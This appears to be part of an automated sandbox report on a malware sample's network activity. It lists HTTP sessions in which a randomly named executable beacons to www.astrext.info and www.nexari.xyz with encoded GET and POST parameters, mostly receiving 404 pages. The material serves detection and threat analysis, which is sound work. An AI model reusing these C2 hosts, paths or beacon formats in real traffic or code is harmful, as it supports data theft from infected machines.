                                                                                                                                                                          Data Ascii: 9X=4bTYW5Xfdirug5iNwlDA/qOYDwOQNHT+QpXSAo1p7vKwRkJSsXenbvpQvvkQWbT9SxEqOkRwzWxWRCr0yySXceheejMwGitdh+lhqkX+t2RdHEPVY7zJUJUuEpsGpH2NiPGkK7Zo6OhidnKeVZwlksSx2b1ylQ/X469CYGVY9/6bXPWL6UxE5iu7AYR4qD9iqFUFRjq34Ectwv2z9UynKOIFyWt4T/QRTncUK5WgXlGEhSPD0fnbGfwPuutsCfW48SSXZOqBUR3qd5ncsg2IQ9+8D2VAKlJ6FXQ5luZ9Iih5VHBSO2t650XP9IpScNlmTyfLf4CLd6UayR8gKRQNihavkbjBhOjhSvETSDW3XOl7nFWoc9AaUNehsZ8tyjhqLK2tQM9y0EGBNemzQmBwBMLBH2SDrbOkN3ixfC5DjYNvjP+yeZMZgIffX4SXzG0KTcCu1/Ax6r1Gaa8VlV6lVw0SqsdWKtugRHCmY/SQ9aOtdVD7J1gm1W8JFvX/JOTSKty9bfB108eBkVNEgz7ahES6iiYGEjU4YCKeH69MYAtaUt7esfjOEXfd16WmPyLt5f/1roae9HE+ds/mByqT2M51/2Fnz2kOfCcxwYHFhoEKSlp67l6d8rsVkGIQAgOv2L2JpZljJonauaORZ2EIl9oOG5Mvbb7VLt+MUPniwE0GvFzFZl6WOd6Y1Az1KiiY31+xBNC9CB6zY4MySXwpUVk+pQKTkHPsMM7u0VPIr6kR0KwSnlgp4gg/FPXFMpvL1HzFX/lRNBkkwq8UoOAKC6cWzsiJWD+RoqzK6nZCNr7bea57nSN1EoBSwyCZ/n3L5AgdghMHg/M4LIu8XKv9qywGQX96fyFf2UdKXyj5U9c5iOzZoiyoVRBDr9ZfZghxQQnBBb/X4WLjeCB1tVpIvk1oXSUlgpn917udeF8M6EiqbweV+isZ0KE9Y6H31mURQTw9xqsWmQYaOOC/3Oc43tU3vxq3Gpgw8uanQ+nceWS+fAdPI [TRUNCATED]
                                                                                                                                                                          Oct 23, 2024 17:13:40.089466095 CEST780INHTTP/1.1 404 Not Found
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:13:39 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          X-Frame-Options: deny
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          Data Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 [TRUNCATED]
                                                                                                                                                                          Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          12192.168.2.549989217.160.0.132802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:13:41.788021088 CEST520OUTGET /igvi/?9X=1Z74VMbfQx3SoauZzBTM+a//aSvcAjLme6CXEJ06hrGnbB9hlVufDNB6xfV3H9TSbDN3LR5Y30pDSwif1kmvReNxbTsCEz1yl5l5s2yLmzBxFHjNeqHXJu8pRbMXulPG1g==&1BSHu=OBVxGh8PUTflSv4p HTTP/1.1
                                                                                                                                                                          Host: www.astrext.info
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Oct 23, 2024 17:13:42.624665976 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 1271
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:13:42 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          X-Frame-Options: deny
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c [TRUNCATED]
                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + [TRUNCATED]
                                                                                                                                                                          Oct 23, 2024 17:13:42.624686003 CEST203INData Raw: 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 55 4b 27 0a
                                                                                                                                                                          Data Ascii: + window.location.host + '/' + 'IONOSParkingUK' + '/park.js">' + '<\/script>' ); </script> </body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          13192.168.2.549990162.0.211.143802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:13:47.818368912 CEST763OUTPOST /5b3f/ HTTP/1.1
                                                                                                                                                                          Host: www.nexari.xyz
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 203
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.nexari.xyz
                                                                                                                                                                          Referer: http://www.nexari.xyz/5b3f/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 2b 55 43 6f 42 70 61 32 32 71 59 34 30 4d 43 70 34 45 44 69 6e 6e 75 72 70 6e 72 72 31 51 30 35 45 47 51 6f 72 78 43 36 50 57 4e 63 45 62 77 58 71 6e 4c 33 77 78 7a 42 52 71 74 70 75 69 38 6b 48 5a 48 7a 72 5a 44 56 4c 50 55 35 47 37 71 4f 7a 59 31 63 6b 33 31 77 75 63 42 5a 6c 43 33 66 55 4b 71 54 72 41 33 59 32 56 73 51 63 46 72 37 6d 49 30 6a 41 55 4a 79 6e 72 38 72 39 75 72 68 38 30 70 4d 2b 76 77 32 7a 58 6b 64 55 62 6e 47 78 38 69 5a 51 74 37 34 6a 5a 31 57 47 41 46 6c 51 56 52 32 35 39 58 6a 4e 34 4d 50 73 6d 33 6c 63 6c 7a 55 57 37 41 47 43 37 67 32 73 59 6c 65 2f 6a 4e 47 59 4b 73 3d
                                                                                                                                                                          Data Ascii: 9X=+UCoBpa22qY40MCp4EDinnurpnrr1Q05EGQorxC6PWNcEbwXqnL3wxzBRqtpui8kHZHzrZDVLPU5G7qOzY1ck31wucBZlC3fUKqTrA3Y2VsQcFr7mI0jAUJynr8r9urh80pM+vw2zXkdUbnGx8iZQt74jZ1WGAFlQVR259XjN4MPsm3lclzUW7AGC7g2sYle/jNGYKs=
                                                                                                                                                                          Oct 23, 2024 17:13:48.513768911 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:13:48 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Content-Length: 389
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          14192.168.2.549991162.0.211.143802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:13:50.372400045 CEST783OUTPOST /5b3f/ HTTP/1.1
                                                                                                                                                                          Host: www.nexari.xyz
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 223
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.nexari.xyz
                                                                                                                                                                          Referer: http://www.nexari.xyz/5b3f/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 2b 55 43 6f 42 70 61 32 32 71 59 34 33 73 53 70 2f 56 44 69 76 6e 75 71 6d 48 72 72 2b 77 30 39 45 47 4d 6f 72 30 69 71 49 6b 35 63 46 2f 30 58 72 6d 4c 33 6c 78 7a 42 62 4b 74 73 6a 43 38 56 48 5a 4b 4f 72 63 37 56 4c 50 6f 35 47 2f 36 4f 79 6f 4a 64 6c 6e 31 2b 33 73 42 66 6d 79 33 66 55 4b 71 54 72 41 6a 6d 32 56 30 51 63 31 37 37 38 71 63 67 63 45 4a 39 67 72 38 72 33 2b 71 6d 38 30 6f 5a 2b 75 73 50 7a 53 67 64 55 5a 2f 47 78 4e 69 61 46 64 37 79 73 35 30 49 49 43 49 65 51 6b 42 44 35 72 4f 6c 5a 70 73 6b 70 51 47 50 47 48 37 38 46 62 73 2b 53 6f 6f 42 39 6f 45 33 6c 41 64 32 47 64 36 67 6b 42 33 66 59 52 71 63 6b 61 74 67 37 59 66 30 77 64 2f 72
                                                                                                                                                                          Data Ascii: 9X=+UCoBpa22qY43sSp/VDivnuqmHrr+w09EGMor0iqIk5cF/0XrmL3lxzBbKtsjC8VHZKOrc7VLPo5G/6OyoJdln1+3sBfmy3fUKqTrAjm2V0Qc1778qcgcEJ9gr8r3+qm80oZ+usPzSgdUZ/GxNiaFd7ys50IICIeQkBD5rOlZpskpQGPGH78Fbs+SooB9oE3lAd2Gd6gkB3fYRqckatg7Yf0wd/r
                                                                                                                                                                          Oct 23, 2024 17:13:51.046890020 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:13:50 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Content-Length: 389
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          15192.168.2.549992162.0.211.143802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:13:52.922655106 CEST1800OUTPOST /5b3f/ HTTP/1.1
                                                                                                                                                                          Host: www.nexari.xyz
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 1239
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.nexari.xyz
                                                                                                                                                                          Referer: http://www.nexari.xyz/5b3f/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 2b 55 43 6f 42 70 61 32 32 71 59 34 33 73 53 70 2f 56 44 69 76 6e 75 71 6d 48 72 72 2b 77 30 39 45 47 4d 6f 72 30 69 71 49 6b 42 63 46 4d 38 58 72 46 6a 33 33 42 7a 42 59 4b 74 74 6a 43 38 79 48 61 36 4b 72 63 2f 6a 4c 4a 73 35 45 64 79 4f 36 37 52 64 76 6e 31 2b 71 63 42 61 6c 43 32 66 55 4a 53 58 72 41 7a 6d 32 56 30 51 63 32 54 37 79 6f 30 67 4d 30 4a 79 6e 72 38 33 39 75 72 42 38 77 4e 69 2b 75 6f 41 79 6d 55 64 56 35 76 47 68 76 61 61 48 39 37 38 70 35 30 41 49 43 45 42 51 6b 64 35 35 72 53 44 5a 75 59 6b 72 6b 72 32 53 47 48 66 66 49 4e 65 52 70 77 67 72 6f 77 43 6d 6a 4a 42 44 4f 71 47 6d 6c 76 68 4f 6c 71 59 68 62 38 74 6c 38 50 41 79 37 75 56 75 4e 4a 68 47 69 56 6b 69 58 52 75 63 36 68 67 4d 70 4d 62 69 33 49 36 67 4b 72 66 43 36 69 30 6e 33 70 73 6d 6b 74 49 75 75 33 35 56 44 79 65 37 4c 6d 6f 69 39 34 30 51 39 30 4f 58 34 63 56 2b 6b 6f 63 6f 69 6c 49 78 59 39 51 4b 6a 33 62 38 6f 68 52 63 52 71 36 66 71 2f 70 63 70 67 41 50 64 2b 35 63 7a 5a 39 52 4a 48 63 70 47 4b 45 75 64 32 [TRUNCATED]
                                                                                                                                                                          Data Ascii: 9X=+UCoBpa22qY43sSp/VDivnuqmHrr+w09EGMor0iqIkBcFM8XrFj33BzBYKttjC8yHa6Krc/jLJs5EdyO67Rdvn1+qcBalC2fUJSXrAzm2V0Qc2T7yo0gM0Jynr839urB8wNi+uoAymUdV5vGhvaaH978p50AICEBQkd55rSDZuYkrkr2SGHffINeRpwgrowCmjJBDOqGmlvhOlqYhb8tl8PAy7uVuNJhGiVkiXRuc6hgMpMbi3I6gKrfC6i0n3psmktIuu35VDye7Lmoi940Q90OX4cV+kocoilIxY9QKj3b8ohRcRq6fq/pcpgAPd+5czZ9RJHcpGKEud2veYX2mdjSsryy4UqbpcP7I9hsWdC6TUhxDgOxsaLNWNfJKSEJYmiRNAMHwA8dIR7y5bI9lih1VZTWp7SqsdNhwRspNh1QM/rBM19H5XqoX9cvSjdCxp56MQn3z8kgFgdQyBE6YirG3/eBJ8IaNRJrfODx4/9+hLXcE+aG9fDQxA68eQDZ/nrnb8Flfu+Db0zZNTJ8HkoOAFqlHfx6NGTm1sEFS16slL8YT+pnMNy/kfqdqD0S0Jbf93ih+vZPj6eLGrSLHxhj2HiWHw6QfA24g5HaOZT8yHZwTHKIt438Ow5TM5NtaxNSFGJ+/XIH45SGcUy9EtMlyarkTD7zQYfRvVoc61Fd/NswRmgxSUDzuKNjTqr10OjNYYDFqyZQsC4mo7zlnhElAFUKdPeBL0M9ulM1yW4UGQ9DbVUcfLkzp0y3zmjKUjq8XGhJGodQ7dr2DqFSlLS7kgGBX43oGImgYOYB904LwROTwnkBkB3IoodwsHJagwsj+XXbeMXrYyV0yT1W3hH0wkqfnJ96CFPMDBYGNFsGuL6NjeQVlt2uxVvZ9tOHL4vPA9d9x+N646ceg3kZKasWZcgIcS5kJX+BmqL60VTWjDBSdLZpDrlc41pPRv1J+IeemHa7IJdhm42ZP0lgbwiVSf1XzfiezUtSFXhh+3OHgOVzc [TRUNCATED]
                                                                                                                                                                          Oct 23, 2024 17:13:53.596513987 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:13:53 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Content-Length: 389
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          16192.168.2.549993162.0.211.143802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:13:55.464106083 CEST518OUTGET /5b3f/?9X=zWqICce78KsRsb3emhnNvHvM+W3x418idXM1rAmyQjpDKOJvjXjB2SvsM5F8iWg/KY2mpJvFIaNUJt7K+YoonzlyhZp7qTKaZMaVqhKjy1MfdFS8xqYwAVxm55oG8sOrtw==&1BSHu=OBVxGh8PUTflSv4p HTTP/1.1
                                                                                                                                                                          Host: www.nexari.xyz
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Oct 23, 2024 17:13:56.161041975 CEST548INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:13:56 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Content-Length: 389
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
